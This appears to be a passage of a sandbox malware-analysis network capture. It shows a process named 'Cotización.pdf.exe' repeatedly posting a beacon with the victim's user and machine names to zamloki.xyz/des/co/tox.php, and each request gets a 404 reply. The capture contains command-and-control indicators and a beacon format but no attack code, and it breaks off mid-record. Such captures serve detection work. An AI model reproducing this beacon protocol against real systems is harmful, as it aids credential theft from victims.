                                    Jul 21, 2021 17:02:32.907388926 CEST | 5606 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:33.204293966 CEST | 5607 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZakDddFyg6EWnXKEDznMwPL5FrQUmdEMnNkY7qB2occrtR%2FitB1kI8Lqt2kw7SNQZXvEd3BmsTSiGM%2B1xa3ZIygt614vuPjd0MBnjd9sx%2B1LUvMmCMhDVYGXVwXW1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f979be94e5b-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    78 | 192.168.2.3 | 49815 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:33.415034056 CEST | 5608 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:33.433681965 CEST | 5608 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:33.672878027 CEST | 5609 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tllBRmylcZA33KVOhjlE7jjWef6ZjpmcCbGzJYQROdlZn8%2FeoAoOlx4%2BkT2xCvjvLUmaWmm8%2BuvUYe1sYD9e%2FhijIA4nWWHzAThJkOoccKzFXM2RColehT0RadHcrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f9aeba62c26-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    79 | 192.168.2.3 | 49816 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:33.875912905 CEST | 5609 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:33.897332907 CEST | 5610 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:34.153239012 CEST | 5610 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X%2B5YPneJjO5R1fP631dWOoh9F5lUp2OsytC%2B9tw4tcAwtvClITASLrYadulSYFHfnCyBZph3RQZrghi6QBBpc0K%2FG0Ladb0pA7ywSdUBMNMZmaLmQkmbzMD8EqreTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f9dccbdd6c1-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    8 | 192.168.2.3 | 49736 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:52.475317955 CEST | 1292 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:52.495419979 CEST | 1292 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:52.748554945 CEST | 1293 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fioOzaKNPTtwICkRN3aMOamnOQyuayoXhaeRQu2KLfFvxp7tuyRIoFIC%2BC6CABR0z01irMbDIyId%2FOdYbKQwbmCzbA%2FkyI0zUpnGvFs%2BiIoEG8uYgIQiJTXMnMTqrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e9b0e711f25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    80 | 192.168.2.3 | 49817 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:34.390110970 CEST | 5611 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:34.408862114 CEST | 5612 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:34.666239977 CEST | 5612 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bFNf%2Bt9af5TD4ctvEyTuvwTFtScPiyLS4Caclw177Hadt%2FyIbqcQmfMSRH3VV1w1LQn4wVrjvKCuRiZqEuHszkwq53uNs5noJMAZMMZjo1KufRcNN5gMXOnZXSjIMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa1084e4a9e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    81 | 192.168.2.3 | 49818 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:34.914148092 CEST | 5613 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:34.934027910 CEST | 5613 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:35.236706972 CEST | 5614 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QU8DB0gfr7DIsbK%2BWArqm4Qf1jHMljAZdVzouEOEh%2FZDQs%2FR1xTCCMMVoUUAXmgxY%2BSVgYQIyhe7UHmVLP2NCyxdBUSDP6wUxM9ZY%2B9v%2Fl5Lu65I8%2F1ewz%2B8ayCIow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa44d9f05dc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    82 | 192.168.2.3 | 49819 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:35.455161095 CEST | 5615 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:35.473331928 CEST | 5615 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:35.748667955 CEST | 5616 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AT73MEvW0zdyA8YaepmNBw1xvvZcMJ41f8aW0E%2FxXZJibMKSZqW26QP58Kx5HH%2Fpx3qA1fh%2Bz8FiVBM55cjLI7XUVwfkoiIx3QPhg1%2FzZBEoMMISMZzSTxrCfIyAbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa7ac904a74-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    83 | 192.168.2.3 | 49820 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:35.957509041 CEST | 5617 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:35.977525949 CEST | 5617 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:36.568526983 CEST | 5618 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKV9L8YALWdXpMqZTYwqrEkDiVriWK%2BQ2LdkFfZbETwMwk2bFin9GxFvj4ax3BstVtV4FsXSjTEcrHethH%2BZkb3GqeU9sKucLK%2FYX69ZJ2x7IDmpE8HC8KU8qcoZ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254faaceed177a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    84 | 192.168.2.3 | 49821 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:36.779628992 CEST | 5619 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:36.799360037 CEST | 5619 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:37.055495977 CEST | 5620 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M16V9th6Qc0fAhjCqdMNJ5BPxEo2MUaEYgZhcnggTsTWlroxf5gH%2BK1VaxqAWVpLW9oXXEGeHhKxbzrI83thM0hwbsOuEHsetbx9NPLAELpX79K6L0Q9FDo%2Fo0mE7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254faffb974e14-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    85 | 192.168.2.3 | 49822 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:37.265544891 CEST | 5621 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:37.285908937 CEST | 5621 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:37.673501968 CEST | 5622 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xCr5X5UOsBNO65PibfBIPfZsKc95LFb8DDipkMSr5JiFKjl1XGeKymJKlBizO4E1jTGKObHhbXJeT02rPJKNjh49CAjzR8e57NPtssxYIVUlMNg9QIpRbj9LxoHJFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb2f9d14e25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    86 | 192.168.2.3 | 49823 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:37.872284889 CEST | 5623 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:37.890208960 CEST | 5623 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:38.142652988 CEST | 5624 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K1JzpOVwqox%2BK%2Fqo%2ByT835ZUhEKRpxPGeojVV%2BwIWitgSQH8QktwekLuBfPnsRgYnHQsenc3yRXpyRV8xnsuxXheYW8vXbzISDNX%2F%2BaWAzqYUZbH7bM56w8ZCY5EiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb6cbd42c26-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    87 | 192.168.2.3 | 49824 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:38.354510069 CEST | 5624 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:38.372723103 CEST | 5625 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:38.643256903 CEST | 5625 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkgAd2VazehXurfO6RotEfeXhCsP02dcKvTXZ%2BPaYtX5PqFq6TtnpVjJAGVk8BH2nGpatyh0e7AjQqCaIgXvbPh18%2BgYtqZqFsLpe8l%2BFzKWsE7CXRpE8r0IKIDz0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb9c8522c22-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    88 | 192.168.2.3 | 49825 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:38.846386909 CEST | 5626 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:38.869661093 CEST | 5627 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:39.252804041 CEST | 5627 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zl1xvzyFzsPekiWqiS5L0OnywpQecfVnHU0%2FantniH5Fp%2B7709zIBqqy%2BmQL0s56ONf%2FfVUD2B%2FZhjDf88sqe86PsxRj0WdEc6BSdvZltNmkudEpd6MPNkIQW1J6gA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fbcee831f55-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    89 | 192.168.2.3 | 49826 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:39.462964058 CEST | 5628 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:39.500183105 CEST | 5628 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:39.762248039 CEST | 5629 | IN | HTTP/1.1 404 Not Found
